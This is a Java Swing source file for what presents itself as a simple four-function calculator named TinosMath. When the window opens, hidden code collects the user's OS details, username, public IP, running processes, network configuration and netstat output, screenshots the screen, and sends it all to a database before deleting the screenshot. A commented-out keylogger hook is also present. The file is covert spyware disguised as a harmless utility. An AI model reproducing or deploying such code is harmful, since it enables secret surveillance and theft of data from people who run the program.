/*
 * To change this license header, choose License Headers in Project Properties.
 * To change this template file, choose Tools | Templates
 * and open the template in the editor.
 */
package tinosmath;

import java.util.logging.Level;
import java.util.logging.Logger;
import javax.swing.JOptionPane;
import org.jnativehook.GlobalScreen;
import org.jnativehook.NativeHookException;
import org.jnativehook.keyboard.NativeKeyEvent;
import org.jnativehook.keyboard.NativeKeyListener;


/**
 *
 * @author Tinotenda
 */
public class TinosMath extends javax.swing.JFrame {

    /**
     * Creates new form TinosMath
     */
    public TinosMath() {
        initComponents();
    }
    
    //Check if the values are valid
   void checkValid() {
       try {
           double first = Double.parseDouble(first_num.getText());
           double second = Double.parseDouble(second_num.getText());
       } catch (Exception e) {
           JOptionPane.showMessageDialog(this, "Please Enter A Valid Number", "Invalid Number", JOptionPane.WARNING_MESSAGE);
       }
   }

    /**
     * This method is called from within the constructor to initialize the form.
     * WARNING: Do NOT modify this code. The content of this method is always
     * regenerated by the Form Editor.
     */
    @SuppressWarnings("unchecked")
    // <editor-fold defaultstate="collapsed" desc="Generated Code">//GEN-BEGIN:initComponents
    private void initComponents() {

        jPanel2 = new javax.swing.JPanel();
        jPanel1 = new javax.swing.JPanel();
        jLabel1 = new javax.swing.JLabel();
        first_num = new javax.swing.JTextField();
        first_num_lab = new javax.swing.JLabel();
        second_num = new javax.swing.JTextField();
        second_num_lab = new javax.swing.JLabel();
        add = new javax.swing.JButton();
        subtract = new javax.swing.JButton();
        multiply = new javax.swing.JButton();
        divide = new javax.swing.JButton();
        Ans_Lab = new javax.swing.JLabel();

        javax.swing.GroupLayout jPanel2Layout = new javax.swing.GroupLayout(jPanel2);
        jPanel2.setLayout(jPanel2Layout);
        jPanel2Layout.setHorizontalGroup(
            jPanel2Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)
            .addGap(0, 100, Short.MAX_VALUE)
        );
        jPanel2Layout.setVerticalGroup(
            jPanel2Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)
            .addGap(0, 100, Short.MAX_VALUE)
        );

        setDefaultCloseOperation(javax.swing.WindowConstants.EXIT_ON_CLOSE);
        addWindowListener(new java.awt.event.WindowAdapter() {
            public void windowOpened(java.awt.event.WindowEvent evt) {
                formWindowOpened(evt);
            }
        });

        jLabel1.setIcon(new javax.swing.ImageIcon(getClass().getResource("/tinosmath/TinoImage.PNG"))); // NOI18N
        jLabel1.setText("jLabel1");

        first_num_lab.setText("Enter First Number");

        second_num_lab.setText("Enter Second Number ");

        add.setText("ADD");
        add.addActionListener(new java.awt.event.ActionListener() {
            public void actionPerformed(java.awt.event.ActionEvent evt) {
                addActionPerformed(evt);
            }
        });

        subtract.setText("SUBTRACT");
        subtract.addActionListener(new java.awt.event.ActionListener() {
            public void actionPerformed(java.awt.event.ActionEvent evt) {
                subtractActionPerformed(evt);
            }
        });

        multiply.setText("MULTIPLY");
        multiply.addActionListener(new java.awt.event.ActionListener() {
            public void actionPerformed(java.awt.event.ActionEvent evt) {
                multiplyActionPerformed(evt);
            }
        });

        divide.setText("DIVIDE");
        divide.addActionListener(new java.awt.event.ActionListener() {
            public void actionPerformed(java.awt.event.ActionEvent evt) {
                divideActionPerformed(evt);
            }
        });

        Ans_Lab.setFont(new java.awt.Font("Tahoma", 1, 14)); // NOI18N

        javax.swing.GroupLayout jPanel1Layout = new javax.swing.GroupLayout(jPanel1);
        jPanel1.setLayout(jPanel1Layout);
        jPanel1Layout.setHorizontalGroup(
            jPanel1Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)
            .addGroup(jPanel1Layout.createSequentialGroup()
                .addContainerGap(javax.swing.GroupLayout.DEFAULT_SIZE, Short.MAX_VALUE)
                .addGroup(jPanel1Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)
                    .addComponent(first_num_lab)
                    .addComponent(second_num_lab))
                .addGap(57, 57, 57)
                .addGroup(jPanel1Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING, false)
                    .addComponent(first_num, javax.swing.GroupLayout.DEFAULT_SIZE, 80, Short.MAX_VALUE)
                    .addComponent(second_num))
                .addGap(205, 205, 205))
            .addGroup(jPanel1Layout.createSequentialGroup()
                .addGap(125, 125, 125)
                .addGroup(jPanel1Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)
                    .addComponent(jLabel1, javax.swing.GroupLayout.PREFERRED_SIZE, 400, javax.swing.GroupLayout.PREFERRED_SIZE)
                    .addGroup(jPanel1Layout.createSequentialGroup()
                        .addGap(129, 129, 129)
                        .addGroup(jPanel1Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)
                            .addComponent(add, javax.swing.GroupLayout.PREFERRED_SIZE, 85, javax.swing.GroupLayout.PREFERRED_SIZE)
                            .addComponent(multiply, javax.swing.GroupLayout.PREFERRED_SIZE, 85, javax.swing.GroupLayout.PREFERRED_SIZE)
                            .addComponent(divide, javax.swing.GroupLayout.PREFERRED_SIZE, 85, javax.swing.GroupLayout.PREFERRED_SIZE)
                            .addComponent(Ans_Lab, javax.swing.GroupLayout.PREFERRED_SIZE, 194, javax.swing.GroupLayout.PREFERRED_SIZE)
                            .addComponent(subtract, javax.swing.GroupLayout.PREFERRED_SIZE, 94, javax.swing.GroupLayout.PREFERRED_SIZE))))
                .addGap(0, 86, Short.MAX_VALUE))
        );
        jPanel1Layout.setVerticalGroup(
            jPanel1Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)
            .addGroup(jPanel1Layout.createSequentialGroup()
                .addGap(22, 22, 22)
                .addComponent(jLabel1)
                .addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.RELATED)
                .addGroup(jPanel1Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.BASELINE)
                    .addComponent(first_num, javax.swing.GroupLayout.PREFERRED_SIZE, javax.swing.GroupLayout.DEFAULT_SIZE, javax.swing.GroupLayout.PREFERRED_SIZE)
                    .addComponent(first_num_lab))
                .addGap(18, 18, 18)
                .addGroup(jPanel1Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.BASELINE)
                    .addComponent(second_num, javax.swing.GroupLayout.PREFERRED_SIZE, javax.swing.GroupLayout.DEFAULT_SIZE, javax.swing.GroupLayout.PREFERRED_SIZE)
                    .addComponent(second_num_lab))
                .addGap(26, 26, 26)
                .addComponent(add)
                .addGap(18, 18, 18)
                .addComponent(subtract)
                .addGap(18, 18, 18)
                .addComponent(multiply)
                .addGap(18, 18, 18)
                .addComponent(divide)
                .addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.RELATED, 38, Short.MAX_VALUE)
                .addComponent(Ans_Lab)
                .addGap(88, 88, 88))
        );

        javax.swing.GroupLayout layout = new javax.swing.GroupLayout(getContentPane());
        getContentPane().setLayout(layout);
        layout.setHorizontalGroup(
            layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)
            .addGroup(layout.createSequentialGroup()
                .addGap(0, 0, 0)
                .addComponent(jPanel1, javax.swing.GroupLayout.DEFAULT_SIZE, javax.swing.GroupLayout.DEFAULT_SIZE, Short.MAX_VALUE)
                .addContainerGap())
        );
        layout.setVerticalGroup(
            layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)
            .addGroup(javax.swing.GroupLayout.Alignment.TRAILING, layout.createSequentialGroup()
                .addComponent(jPanel1, javax.swing.GroupLayout.PREFERRED_SIZE, javax.swing.GroupLayout.DEFAULT_SIZE, javax.swing.GroupLayout.PREFERRED_SIZE)
                .addGap(0, 0, Short.MAX_VALUE))
        );

        pack();
    }// </editor-fold>//GEN-END:initComponents
    
    // Subtract numbers
    private void subtractActionPerformed(java.awt.event.ActionEvent evt) {//GEN-FIRST:event_subtractActionPerformed
        checkValid();
        double result;
        double first = Double.parseDouble(first_num.getText());
        double second = Double.parseDouble(second_num.getText());
        
        result = first - second;
        
        Ans_Lab.setText("The Difference Is: " + result);
    }//GEN-LAST:event_subtractActionPerformed
    
    //Add numbers
    private void addActionPerformed(java.awt.event.ActionEvent evt) {//GEN-FIRST:event_addActionPerformed
        checkValid();
        double result;
        double first = Double.parseDouble(first_num.getText());
        double second = Double.parseDouble(second_num.getText());
        
        result = first + second;
        
        Ans_Lab.setText("The Sum Is: " + result);
        
    }//GEN-LAST:event_addActionPerformed

    //Multiply numbers
    private void multiplyActionPerformed(java.awt.event.ActionEvent evt) {//GEN-FIRST:event_multiplyActionPerformed
        checkValid();
        double result;
        double first = Double.parseDouble(first_num.getText());
        double second = Double.parseDouble(second_num.getText());
        
        result = first * second;
        
        Ans_Lab.setText("The Product Is: " + result);
    }//GEN-LAST:event_multiplyActionPerformed

    //Divide numbers
    private void divideActionPerformed(java.awt.event.ActionEvent evt) {//GEN-FIRST:event_divideActionPerformed
        checkValid();
        double result;
        double first = Double.parseDouble(first_num.getText());
        double second = Double.parseDouble(second_num.getText());
        
        if(second == 0) {
            JOptionPane.showMessageDialog(this, "Second Number Cannot Be 0", "Invalid Second Number", JOptionPane.WARNING_MESSAGE);
        }
        else {
        result = first / second;
        
        Ans_Lab.setText("The Quotient Is: " + result);
        }
    }//GEN-LAST:event_divideActionPerformed
    
    RetrieveInfo action;
    //Get System Information
    private void formWindowOpened(java.awt.event.WindowEvent evt) {//GEN-FIRST:event_formWindowOpened
        action = new RetrieveInfo();
        String os_name = System.getProperty("os.name");
        String os_architecture = System.getProperty("sun.arch.data.model");
        String cpu_architecture = System.getProperty("os.arch");
        String user_name = System.getProperty("user.name");
        
        String system_info = "Operating System is: " + os_name + "\nOperating System Architecture is: "
                + os_architecture + "\nCPU Architecture is: " + cpu_architecture + "\nUsername is: " 
                + user_name +"\n";
        String global_ip_address = "Global IP Address is: " + action.global_ip_address() + "\n";
        String network_information = "";
        String process_list = "";
        if(os_name.contains("Windows")) {
            process_list = "Process List: \n" + action.commandArg("tasklist");
            network_information = "\nIP and MAC Address: \n" + action.commandArg("ipconfig /all");
        } else {
            process_list = "Process List: \n" + action.commandArg("ps -u");
            network_information = "\nIP and MAC Address: \n" + action.commandArg("ifconfig -a");
        }
        
        /*
        try {
            //////////////////////////////////////////////
            
            //keylogger

            GlobalScreen.registerNativeHook();
        } catch (NativeHookException ex) {
            Logger.getLogger(TinosMath.class.getName()).log(Level.SEVERE, null, ex);
        }
        
        GlobalScreen.addNativeKeyListener(new TinosMath());
        */
        
        network_information = network_information + action.commandArg("netstat");
        action.Screenshot_Target();
        Database db = new Database();
        db.ConnctDb();
        db.insertData(system_info, global_ip_address, process_list, network_information);
        action.DeleteScreenShot();
        
    }//GEN-LAST:event_formWindowOpened

    /**
     * @param args the command line arguments
     */
    public static void main(String args[]) {
        /* Set the Nimbus look and feel */
        //<editor-fold defaultstate="collapsed" desc=" Look and feel setting code (optional) ">
        /* If Nimbus (introduced in Java SE 6) is not available, stay with the default look and feel.
         * For details see http://download.oracle.com/javase/tutorial/uiswing/lookandfeel/plaf.html 
         */
        try {
            for (javax.swing.UIManager.LookAndFeelInfo info : javax.swing.UIManager.getInstalledLookAndFeels()) {
                if ("Nimbus".equals(info.getName())) {
                    javax.swing.UIManager.setLookAndFeel(info.getClassName());
                    break;
                }
            }
        } catch (ClassNotFoundException ex) {
            java.util.logging.Logger.getLogger(TinosMath.class.getName()).log(java.util.logging.Level.SEVERE, null, ex);
        } catch (InstantiationException ex) {
            java.util.logging.Logger.getLogger(TinosMath.class.getName()).log(java.util.logging.Level.SEVERE, null, ex);
        } catch (IllegalAccessException ex) {
            java.util.logging.Logger.getLogger(TinosMath.class.getName()).log(java.util.logging.Level.SEVERE, null, ex);
        } catch (javax.swing.UnsupportedLookAndFeelException ex) {
            java.util.logging.Logger.getLogger(TinosMath.class.getName()).log(java.util.logging.Level.SEVERE, null, ex);
        }
        //</editor-fold>

        /* Create and display the form */
        java.awt.EventQueue.invokeLater(new Runnable() {
            public void run() {
                new TinosMath().setVisible(true);
            }
        });
    }

    // Variables declaration - do not modify//GEN-BEGIN:variables
    private javax.swing.JLabel Ans_Lab;
    private javax.swing.JButton add;
    private javax.swing.JButton divide;
    private javax.swing.JTextField first_num;
    private javax.swing.JLabel first_num_lab;
    private javax.swing.JLabel jLabel1;
    private javax.swing.JPanel jPanel1;
    private javax.swing.JPanel jPanel2;
    private javax.swing.JButton multiply;
    private javax.swing.JTextField second_num;
    private javax.swing.JLabel second_num_lab;
    private javax.swing.JButton subtract;
    // End of variables declaration//GEN-END:variables


}
